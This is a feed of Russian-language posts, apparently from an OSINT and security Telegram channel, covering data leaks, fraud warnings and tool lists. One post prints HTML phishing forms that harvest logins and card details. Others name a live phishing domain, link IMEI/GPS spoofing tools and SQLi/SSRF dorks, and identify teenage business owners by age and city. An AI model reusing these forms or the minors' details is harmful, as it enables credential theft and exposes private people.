-
Интернет-Розыск.рф - это информационно-аналитическая компания, занимающаяся предупреждением и расследованием преступлений против субъектов бизнеса. Сфера деятельности: корпоративная безопасность.
В Санкт-Петербурге прошел первый городской чемпионат по спортивному программированию. Победителей определили в трех дисциплинах.
В программировании беспилотных летательных аппаратов спортсменам предстояло поднять технику в воздух и затушить условный пожар. Для этого нужно было отсканировать QR-коды в заданных точках. Кроме беспилотников, спортсмены программировали виртуальных роботов. Самым сложным для участников оказалась ориентация в трехмерном пространстве.
⚡ФСП СПб
🐾 Ресурсы для отработки навыков разведки с открытым исходным кодом:
➡️https://tryhackme.com/r/room/ohsint
➡️https://tryhackme.com/r/room/sakura
➡️https://tryhackme.com/r/room/webosint
➡️https://tryhackme.com/r/room/somesint
➡️https://tryhackme.com/r/room/searchlightosint
➡️https://tryhackme.com/r/room/geolocatingimages
➡️https://tryhackme.com/r/room/shodan
➡️https://youtube.com/playlist?list=PLc_hdO4HVYGCg21E7lSQY6UltFigzwbbw&si=JrECV_G4g69GGYs5
➡️https://www.youtube.com/watch?v=4Hkdxnqz1mg&list=PLtoC6Cd29__XR223Kgup_eOD-8EkDQctr
➡️https://www.osintdojo.com/resources/#ctfs
➡️https://www.geoguessr.com/
➡️https://sourcing.games/
➡️https://kasescenarios.com/
➡️https://gralhix.com/list-of-osint-exercises/
➡️https://www.reddit.com/r/geochallenges/
➡️https://www.reddit.com/r/Whatisthis/
➡️https://tracelabs.org/
➡️https://dataqa.ru/osint-igry/
➡️https://hackyourmom.com/en/kibervijna/osint-ctf-challenges/
➡️https://github.com/yaelwrites/Big-Ass-Data-Broker-Opt-Out-Lis
➡️https://inteltechniques.com/workbook.html
➡️https://inteltechniques.com/exposure.html
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #TRANING
База данных более 28 000 пользователей одного из крупнейших продавцов парфюмерно-косметической продукции в России (как они о себе пишут) — интернет-магазина Parfum-paradise — оказалась в открытом доступе.
Хотя судя по состоянию сайта, его развитием никто не занимается, о чём свидетельствует, например, раздел «О компании» на главной странице, где просто указано общее описание понятия "интернет-магазина", последняя новость от 2018 года, а в группа VK заблокирована, однако проблема возникла из-за использования системы Bitrix.
Актуальность - 25.09.2024
Состав
▪️ФИО
▪️Почта
▪️Телефон
#утечка #bitrix
Австралия готовит вход в соцсети по паспорту.
В местном парламенте предложили полностью ограничить вход в соцсети лицам младше 16 лет, причем без исключений для согласия родителей — это будет самый жесткий возрастной барьер в мире. Возраст собираются проверять с помощью биометрии или госидентификации.
Илон Маск раскритиковал эти планы, назвав власть в Австралии фашистами:
"Похоже, что это скрытый способ контролировать доступ к интернету всех австралийцев".Читать полностью…
Компания, заявляющая о защите от взломов всех видов, не смогла обеспечить безопасность данных своих клиентов.
База данных 117 000 пользователей сайта Bastin-S, специализирующегося на дверях и замках, была выставлена на продажу на специализированных сайтах.
Актуальность - 29.10.2024
Состав
▪️ФИО
▪️Почта
▪️Телефон
#утечка #amocrm
Думаю, многие уже знают о новой схеме мошенничества через домовые чаты, где предлагают забрать ненужные мебель или бытовую технику. Однако незадолго до встречи звонит мошенник и предлагает оформить вызов транспортной компании. Конечно же, за свой счёт.
Но для этого нужно установить на телефон специальное приложение «Яндекс Трекинг», которого в природе не существует.
И вот удалось найти живой пример такого фишингового ресурса по адресу DOWNLOAD-APP-ID74261.RU, чтобы вы могли безопасно ознакомиться с шаблоном, понимая, что это точно мошенники.
Судя по названию домена, мошенники только начинают свою деятельность, а этот файл уже давно находится в базах антивирусных программ.
Также следует обратить внимание, что у подобных фейковых маркетплейсов приложений обычно другие ссылки не активны.
#фишинг #яндекс
🔤 Android IMEI Changer - программа для смены IMEI идентификаторов на телефоне под архитектурой ARM
➡️https://github.com/Untouchable17/Android-IMEI-Changer
➖ Добавлен скрипт, позволяющий подменять GPS-координаты устройства.
➖ Добавлен скрипт для изменения ID устройства, который позволяет подменять уникальный идентификатор устройства.
➖ Добавлен скрипт для изменения MAC-адреса устройства, который позволяет подменять уникальный идентификатор сетевого интерфейса.
ℹ️ Альтернативный софт:
➡️https://apkresult.com/en/xposed-imei-changer-pro-apk
➡️https://androidmtk.com/download-mobileuncle-apk
➡️https://play.google.com/store/apps/details?id=com.themonsterit.EngineerStarter
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #PHONE #IMEI
Тренды науки и технологий 2025 года
👋 Команда поисково-аналитической платформы INVENTORUS подготовила прогноз по трендам, которые будут определять развитие науки и технологий в ближайшие годы.
🔍 По тематикам запросов найдено и проанализировано более 300 тыс. патентов и 600 тыс. публикаций из 45 стран, вышедших за период с 2020 г. по III кв. 2024 г.
Топ направлений в науке и технологиях:
1️⃣Искусственный интеллект 2.0: переход от машинного обучения к полноценным цифровым партнёрам
Инновации: генеративный ИИ, повышение надёжности и этичности технологий, применение для устойчивого развития
Ограничения: высокая зависимость от качества данных, энергозатраты, вопросы конфиденциальности
2️⃣Квантовый рывок: развитие квантовых вычислений для сверхскоростей и точности
Инновации: гибридные квантово-классические архитектуры, нейроморфные системы
Ограничения: сложности масштабирования и надёжности квантовых технологий
3️⃣Биомедицинские прорывы: создание искусственных органов, клеточная инженерия, медицина на заказ
Инновации: новые материалы для 3D-биопечати, эпигенетическое омоложение, бионические конечности
Ограничения: резистентность опухолей, сложности воспроизведения структурных тканей
4️⃣Декарбонизация и зелёные технологии: ближе к углеродной нейтральности: переработка отходов, зелёные технологии в промышленности
Инновации: возобновляемая энергия, биогаз, устойчивое строительство
Ограничения: несовершенство технологий хранения энергии, риски "зеленого камуфляжа"
5️⃣Цифровое общество: баланс между удобством и зависимостью от технологий
Инновации: суперумное общество, персонализированный маркетинг, цифровая грамотность
Ограничения: цифровое неравенство, влияние технологий на психическое здоровье
❗️Полный отчет здесь. Не забудьте поделиться с коллегами!
#анатитика_и_тренды
🔤 Google Dorks for Bug Bounty - движок включает в себя множество потрясающих dorks для, например, облачного хранилища, параметров SQLi Prone, параметров SSRF Prone, конечных точек API и многого другого.
➡️https://taksec.github.io/google-dorks-bug-bounty/
➡️https://github.com/TakSec/google-dorks-bug-bounty/
ℹ️ Альтернативные сервисы:
➡️https://dorks.faisalahmed.me/#
➡️https://nitinyadav00.github.io/Bug-Bounty-Search-Engine/
➡️https://pentest-tools.com/information-gathering/google-hacking
➡️https://elite-google-dorks-search-by-biscuit.vercel.app/
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #DORK #BUG
⚡Комитет Госдумы по госстроительству и законодательству рекомендовал палате парламента принять во втором чтении законопроект, вводящий уголовную ответственность за создание или обеспечение работы сайтов, страниц сайтов и программ, предназначенных для незаконного оборота персональных данных.
Рекомендовать Государственной думе принять во втором чтении проект федерального закона №502113-8 "О внесении изменений в Уголовный кодекс Российской Федерации". <…> Предложить Совету Государственной думы включить указанный законопроект в проект порядка работы Государственной думы для рассмотрения во втором чтении на 26.11.2024
🦠 Знаете ли вы, что Gmail позволяет использовать HTML-тег <form> ? Эта функция представляет потенциальную угрозу безопасности, особенно при попытке украсть учетные данные пользователя или конфиденциальную информацию. Учитывайте этот риск в процессе обеспечения ИБ.
1⃣Пример кода, выводящего форму для кражи пароля
<form action= "https://httpbin.org/post" method= "POST" >
< input type = "email" name= "email" placeholder= "Email or phone" required>
< input type = "password" name= "password" placeholder= "Password" required>
< input type = "submit" value= "Next" >
</form>
<!DOCTYPE html >
< html lang = "en" >
< head >
< meta charset = "UTF-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1.0" >
< title > Оплата кредитной картой </ title >
</ head >
< body >
< div class = "payment-container" >
< h2 > Оплата кредитной картой </ h2 >
< form action = "https://httpbin.org/post" method = "POST" >
< label for = "cardholder-name" > Имя владельца карты</label> < input type
= " text " id = " cardholder-name" name = "cardholder_name" placeholder = "John Doe" обязательно > <label for = "card-number" > Номер карты</label> < input type = " number " id =
" card - number " name = "
card_number " placeholder = " 1234 5678 9012 3456" обязательно > <label for = "expiry-date" > Дата истечения срока действия</label> < input type = " text " id =
" expiry - date " name = " expiry_date
" placeholder = " MM / YY " обязательно > < label for = " cvv " >
CVV </label> < input type = " number
" id = " cvv " name = " cvv " placeholder = " 123" обязательно >
< input type ="submit" value = "Оплатить сейчас" >
</ form >
</ div >
</ body >
</ html >
База данных с информацией о 70 000 пользователях хостинга серверов Minecraft apexnodes.xyz стала общедоступной.
Интересно, что владельцами хостинга являются три подростка, среди которых - основатель Амир (14 лет, Уральск, Казахстан) и ответственный за финансы Руслан (16 лет, Липецк, Россия) - индивидуальный предприниматель создавший юридическое лицо для приема платежей.
Только вот, штрафы для юридических лиц за утечку персональных данных составляют от 1 до 6 миллионов рублей за первое нарушение и до 18 миллионов рублей за повторную утечку, согласно п.9 ст. 13.11 КоАП РФ.
Состав
▪️Почта
▪️Логин
▪️Хэш-пароля
▪️IP-адрес
Хотим обратить внимание ребят, что для того чтобы считаться «оператором обработки персональных данных», необходимо быть включённым в реестр операторов, обрабатывающих персональные данные.
Однако ИП Руслана и британская компания в этом реестре не значатся.
Пока им ничего не грозит (фактической утечки ПДн нет), но видимо Руслан и его родители сейчас очень сильно напряглись...ведь отвечать именно ему.
#утечка
🖥 Подборки полезного софта для ПК
https://sourceforge.net — один из самых больших в мире каталогов открытого ПО.
https://www.producthunt.com — популярная онлайн-платформа, созданная для поиска новых продуктов, стартапов и инновационных решений на рынке технологий.
https://alternativeto.net — сервис помогает находить альтернативы любимым продуктам.
https://alternative.me — сайт для поиска альтернативного программного обеспечения.
https://openalternative.co — каталог open-source софта.
https://www.fosshub.com — большой каталог популярного софта.
https://hub.docker.com — платформа для хранения и обмена контейнерами Docker, где разработчики могут находить, загружать и делиться контейнерами для быстрого развертывания приложений.
https://www.comss.ru/list.php?c=security — большая подборка программ, связанных с безопасностью.
🖥 Реестр доверенного российского ПО от Минцифры
https://reestr.digital.gov.ru/reestr/
🖥 Подборки с полезным софтом для Android
https://f-droid.org — бесплатное и открытое программное обеспечение для Android.
https://www.rustore.ru — российский официальный магазин приложений для Android.
🖥 Подборка ПО для железа/hardware
https://www.aida64.com/downloads — приложение для тестирования производительности системы, диагностика и получение информации о ПК.
https://www.techpowerup.com/gpuz — бесплатная утилита для отображения технической информации о видеоадаптере.
https://www.cpuid.com/softwares/cpu-z.html — бесплатная прикладная утилита для отображения технической информации о персональном компьютере.
https://getfancontrol.com — утилита для управления скоростью вентиляторов (CPU, GPU, системной платы, жёстких дисков).
https://crystalmark.info/en/software/crystaldiskinfo — подробная информация о HDD/SSD, показывает состояние "здоровья" и температуру нагрева.
🖥 Portable-версии популярного софта (без установки в реестре)
https://portableapps.com
🖥 Коллекция полезных утилит от Нира Софера
https://www.nirsoft.net
🖥 Коллекция полезных бесплатных утилит от Марка Руссиновича
https://live.sysinternals.com
Сервис TAMS, команда которого имеет опыт в автоматизации логистики и диспетчеризации на протяжении 10 лет, стал жертвой хакерской атаки.
В открытый доступ попала пробная версия базы данных компании, а также информация об уровне парольной политики в формате test:test.
Среди клиентов TAMS можно отметить крупные компании, занимающиеся доставкой еды, такие как m-food.ru и levelkitchen.com, а также одежды от stockmann.ru и строительный магазин ЛЕ Монлид (бывший Леруа Мерлен).
Утечка могла затронуть более 8 миллионов заказов.
Актуальность - 27.08.2024
Состав
▪️ФИО
▪️Адрес доставки
▪️Телефон
▪️Почта
▪️Партнер
#утечка #леруа #стокманн
#tools Всем любителям и профессионалам #OSINT напоминаю о том, что нашим отделом расследований сделана собственная версия браузера OPERA для Windows, предназначенная для проведения расследований по открытым источникам информации.
Браузер портативный, т.е. вы можете брать его с собой на флешке. На борту имеется тонна ссылок на полезный софт и онлайн-сервисы. Все разбито по направлениям исследований: Telegram, веб-ресурсы, криптовалюты, электронная почта, телефонные номера и т.п. Отдельная рублика сделана специально для сотрудников служб безопасности.
@tomhunter
🔤 Awesome Vehicle Security - список потрясающих ресурсов, книг, оборудования, программного обеспечения, приложений, людей, за которыми стоит следить, и других интересных вещей о безопасности транспортных средств, взломе автомобилей и настройке функциональности автомобиля.
➡️https://github.com/jaredthecoder/awesome-vehicle-security
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #CAR #HACK
Компания, заявляющая о защите от взломов всех видов, не смогла обеспечить безопасность данных своих клиентов.
База данных 117 000 пользователей сайта Bastin-S, специализирующегося на дверях и замках, была выставлена на продажу на специализированных сайтах.
Актуальность - 29.10.2024
Состав
▪️ФИО
▪️Почта
▪️Телефон
#утечка #amocrm
На специализированных ресурсах продаётся база данных компании RAGNAR MACHINERY, предоставляющей услуги аренды специальной техники.
В результате утечки пострадали более 144 000 пользователей, которые могут стать жертвами мошенничества с предоплатой за аренду спецтехники.
Актуальность - 29.10.2024
Состав
▪️ФИО
▪️Телефон
#утечка #amocrm
⚪️Черная пятница на носу, а значит, нас ждут… Да что вы, какие скидки. Ждут нас сети мошенников, которые стараются заполучить наши денежки, с которыми в «дни больших распродаж» россияне с радостью расстаются. По некоторым оценкам, в сезон распродаж число случаев мошенничества взлетает на 30%. И чем ближе «Черная пятница», которая этом году приходится на 29 ноября, тем выше у любителей онлайн-шопинга риск быть обманутыми - пишет KP.RU.
Всегда проверяйте URL сайта. Он должен совпадать с официальным адресом бренда, - настоятельно рекомендует генеральный директор компании Интернет-Розыск.рф Игорь Бедеров. - Обратите внимание на наличие протокола безопасности (https, а не http) и символ замка в адресной строке. Также рекомендуется изучить регистрационные данные домена сайта в любом из общедоступных сервисов WHOIS (whois.ru, reg.ru/whois, who.is и т. д., - Ред.). Домен надежной организации не может быть зарегистрирован месяц назад, находиться в непонятной юрисдикции и принадлежать анониму. Если предложение кажется слишком хорошим, чтобы быть правдой, вероятнее всего, это мошенничество. Бесплатный сыр бывает только в мышеловках. Также всегда полезно искать отзывы о магазине на независимых платформах.
Проверяйте отправителя и не переходите по подозрительным ссылкам, - говорит Игорь Бедеров. - В крайнем случае, проверяйте такие гиперссылки в антивирусе. Избегать предзаказов на незнакомых ресурсах, особенно если они требуют вводить данные карты. Используйте официальные приложения и сайты для покупок, а также изучайте условия возврата и гарантии.
Защитите свои устройства с помощью антивирусных программ и регулярно обновляйте их, - добавляет правил безопасности Игорь Бедеров. - Настройте двухфакторную аутентификацию и дополнительные облачные пароли защиты для своих учетных записей. Запретите проведение оплат посредством SMS-команд банку и не храните пароли к онлайн-сервисам в своем браузере. Используйте для этого менеджер паролей.
☝️😉👍 А мне лично зашло! Автору - респект!!!
▫️Как проверить контрагента без регистрации и СМС. Часть 1
▫️Как проверить контрагента без регистрации и СМС. Часть 2
▫️Как проверить контрагента без регистрации и СМС. Часть 3
▫️Как проверить контрагента без регистрации и СМС. Часть 4
▫️Как проверить контрагента без регистрации и СМС. Часть 5
▫️Как проверить контрагента без регистрации и СМС. Часть 6
База данных пользователей интернет-магазина одежды, снаряжения для охоты, рыбалки и силовых структур «БШФ+» стала доступна в интернете.
Утечка затронула персональную информацию 5000 пользователей сайта и 17000 заказов.
Актуальность - 20.03.2024
Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Адрес доставки
▪️ip-адрес
#утечка
😆😂 "База" о киберразведчиках и военно-политических аналитиках от Игоря Ашманова. Красиво, чесслово!
Читать полностью…
🔤 SEON — это инструмент для предотвращения мошенничества, который создает подробные цифровые следы пользователей, анализируя их адреса электронной почты, номера телефонов и IP-адреса. SEON проверяет все присутствие человека в сети — его аккаунты в социальных сетях, цифровую активность и поведение устройств. Пробный период: 500 проверок/месяц.
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #TOOLS #SEON
А вот и трансляцию выложили...
📱 https://vk.com/video-26514504_456245505
ODIN
IP search engine.
Search by ip, domain name, ASN, geolocation, BGP prefix, ASN number, WHOIS updated date and other parameters.
search.odin.io
Creator twitter.com/OdinThreatIntel
#osint
Sandee - подробная карта пляжей планеты.
Бесплатный общедоступный сервис, где можно найти даже малоизвестные пляжи, в самых разных странах мира.
Позволяет узнать подробности о пляже вместе с фотографиями.
https://sandee.com/map
👉 Подписывайтесь на OSINT Беларусь